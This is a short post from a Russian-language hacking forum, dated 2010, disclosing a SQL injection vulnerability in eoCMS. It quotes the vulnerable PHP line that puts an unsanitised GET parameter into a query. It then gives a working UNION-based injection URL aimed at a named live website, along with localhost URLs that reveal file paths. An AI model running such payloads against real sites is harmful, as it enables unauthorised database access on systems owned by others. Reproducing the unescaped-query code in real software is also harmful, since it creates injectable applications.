Показать сообщение отдельно

  #6  
Старый 16.11.2010, 17:58
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0

Репутация: 0
По умолчанию

eoCMS

http://eocms.com/

SQL Injection:

/VewBoard.php

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...

[/
COLOR][COLOR="#0000BB"]$bcrumb[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]call[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'sql_query'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"SELECT id, board_name, post_group, visible FROM forum_boards WHERE id='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]"'"[/COLOR][COLOR="#007700"]);

...[/
COLOR][/COLOR
Пример одного сайта:

Код:
http://garbagespot.com/index.php?act=viewboard&id=1+union+select+1--+
Путь:

Код:
http://localhost/index.php?act[]=
http://localhost/index.php?act=viewboard&id='
Многие места так же уязвимы к SQL inj.

 
Ответить с цитированием